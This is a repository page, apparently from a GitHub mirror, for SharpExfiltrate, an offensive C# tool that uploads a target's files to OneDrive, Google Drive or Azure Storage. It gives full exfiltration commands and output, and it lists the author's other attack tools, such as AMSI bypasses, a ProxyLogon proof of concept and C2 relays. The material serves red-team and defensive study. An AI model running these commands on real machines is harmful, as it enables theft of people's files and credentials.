• Stars
    star
    114
  • Rank 308,031 (Top 7 %)
  • Language
    C#
  • Created about 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Modular C# framework to exfiltrate loot over secure and trusted channels.

SharpExfiltrate

SharpExfiltrate is a tiny but modular C# framework to exfiltrate loot over secure and trusted channels. It supports both single-files and full-directory paths (recursively), file extension filtering, and file size filtering. Exfiltrated data will be compressed and encrypted before being uploaded. While exfiltrating a large amount of data will require the output stream to be cached on disk, smaller exfiltration operations can be done all in memory with the "memoryonly" option.

Usage

.\SharpExfiltrate.exe OneDrive --username <redacted> --password "<redacted>" --filepath "C:\Users\<redacted>\Downloads\balenaEtcher-Setup-1.5.120.exe"

  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

[+] Compressing C:\Users\<redacted>\Downloads\balenaEtcher-Setup-1.5.120.exe 140,8MB
[+] Password for Zip file is be4886d6a9004ed
[+] Launching OneDrive module by @Flangvik
[+] Performing Authentication using provided credentials
[+] Confirming access to https://graph.windows.net
[+] Starting OneDrive upload
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (7%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (14%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (28%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (35%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (64%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (71%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (85%)
[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (99%)
[+] Upload completed, file located: https://<redacted>-my.sharepoint.com/personal/<redacted>/Documents/DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip

Upload The entire targets Desktop folder, including files and subfolders, using the OneDrive module.

.\SharpExfiltrate.exe OneDrive --username [email protected] --password "Passw0rd123!" --filepath "C:\Users\<user>\Desktop"

Upload all PDFs from all subfolders in the targets root directory, compressing them all in memory, using the GoogleDrive module

.\SharpExfiltrate.exe GoogleDrive --appname SuperLegitApp --accesstoken "<access-token-string>" --filepath "C:\Users\<user>\" --extensions "pdf;" --memoryonly

Upload all files from all subfolders that are smaler then 1 MB in the targets root directory, using the OneDrive module.

.\SharpExfiltrate.exe OneDrive --username [email protected] --password "Passw0rd123!" --filepath "C:\Users\<user>\" --size 1

Upload a huge ISO image using the OneDrive module

.\SharpExfiltrate.exe OneDrive --username [email protected] --password "Passw0rd123!" --filepath "C:\Users\<user>\Backup\2021_09_09_Win10Image.iso"

Upload all backup images that are less then 500 MB, using the Azure Storage Account module

.\SharpExfiltrate.exe AzureStorage --connectionstring <connection-string> --filepath "C:\Users\<user>\Backup\Images" --extensions "vmdk;vmx;iso;ovf;ova;flp" --size 500

Modules

Each module within SharpExfiltrate can be acccess with a module pre-verb

.\SharpExfiltrate.exe 
  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  OneDrive        Exfiltrate information using the OneDrive module

  GoogleDrive     Exfiltrate information using the GoogleDrive module

  AzureStorage    Exfiltrate information using the Azure Storage Account module

  help            Display more information on a specific command.

  version         Display version information.

OneDrive

The OneDrive module uses a password and username to fetch an access token against the graph API (OneDrive). Note that testing has only been done on Office365 business accounts (tenant joined). MFA needs to be disabled for the 0Auth flow to work.

.\SharpExfiltrate.exe OneDrive
  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  -u, --username      Required. Username (email) for the OneDrive account to store exfiltrated data

  -p, --password      Required. Password for the OneDrive account to store exfiltrated data

  -f, --filepath      Required. Path to file or directory to be exfiltrated

  -e, --extensions    Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)

  -s, --size          Max filesize in MB, all files above this number will be ignored from exfiltration.

  -m, --memoryonly    Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)

  --help              Display this help screen.

  --version           Display version information.

GoogleDrive

The GoogleDrive modules uses a Access Token that can be generated over at https://developers.google.com/oauthplayground/. Scroll down until you find "Drive API v3" on the left hand side. Click it and select https://www.googleapis.com/auth/drive.file, go down and click "Authorize APIs", accept and follow the login steps. You should then be taken to a page where you generate and copy out our Access token. Keep in mind that the access token expries after 3600 seconds.

.\SharpExfiltrate.exe GoogleDrive

  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  -n, --appname        Required. GoogleDrive Application name (Can be anything)

  -t, --accesstoken    Required. Valid access token onbehalf of your GoogleDrive account

  -f, --filepath       Required. Path to file or directory to be exfiltrated

  -e, --extensions     Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)

  -s, --size           Max filesize in MB, all files above this number will be ignored from exfiltration.

  -m, --memoryonly     Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)

  --help               Display this help screen.

  --version            Display version information.

Azure Storage Account

The Azure Storage Account module uses a connection string to create a subfolder (container) called "loot" to which it uploads the exfiltrated data. This requires a Storage Account to be created in Azure, the connection string can be found under "Access keys" in your Storage Account submenu.

.\SharpExfiltrate.exe AzureStorage

  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___
/' _/| || |/  \| _ \ _,\ __\ \_/ / __| | |_   _| _ \/  \_   _| __|
`._`.| >< | /\ | v / v_/ _| > , <| _|| | |_| | | v / /\ || | | _|
|___/|_||_|_||_|_|_\_| |___/_/ \_\_| |_|___|_| |_|_\_||_||_| |___|
@Flangvik - TrustedSec

 1.1.0.0

  -c, --connectionstring    Required. Connection string to your Azure Storage Account

  -f, --filepath            Required. Path to file or directory to be exfiltrated

  -e, --extensions          Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)

  -s, --size                Max filesize in MB, all files above this number will be ignored from exfiltration.

  -m, --memoryonly          Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)

  --help                    Display this help screen.

  --version                 Display version information.

Detection / Defense

See the included yara rule :)

Credits

More Repositories

1

SharpCollection

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.
1,767
star
2

BetterSafetyKatz

Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
C#
788
star
3

TeamFiltration

TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
C#
764
star
4

NetLoader

Loads any C# binary in mem, patching AMSI + ETW.
C#
656
star
5

SharpDllProxy

Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading
C#
523
star
6

AMSI.fail

C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process.
C#
309
star
7

SharpProxyLogon

C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection
C#
226
star
8

CobaltBus

Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus
C#
208
star
9

AzureC2Relay

AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.
C#
195
star
10

DeployPrinterNightmare

C# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!
C#
177
star
11

RosFuscator

YouTube/Livestream project for obfuscating C# source code using Roslyn
C#
119
star
12

ObfuscatedSharpCollection

Attempt at Obfuscated version of SharpCollection
103
star
13

SharpAppLocker

C# port of the Get-AppLockerPolicy PS cmdlet
C#
97
star
14

DLLSideloader

PowerShell script to generate "proxy" counterparts to easily perform DLL Sideloading
C++
93
star
15

UAC-D-E-Rubber-Ducky

Python2 / BASH / VBS- UAC D&E Rubber Ducky
Python
59
star
16

HIDAAF

Python - Human Interface Device Android Attack Framework
Python
36
star
17

HTB-HDBadgeGenerator

HackTheBox High Definition Badge Generator
Python
21
star
18

collector

Utility to analyse, ingest and push out credentials from common data sources during an internal penetration test.
Python
18
star
19

CobaltStuff

12
star
20

AntminerController

C# - Allows for easy changing of pools across multiple miners.
C#
4
star
21

MimiFud

3
star
22

BlackBox-0.1

The baddest box on the frequency
2
star
23

QRucible

Suprise at x33fcon
2
star
24

ProCheat

Cheating on Pro E-Sport LAN events made easy
Visual Basic
1
star
25

StreamStuff

Contains stuff made during streams
C#
1
star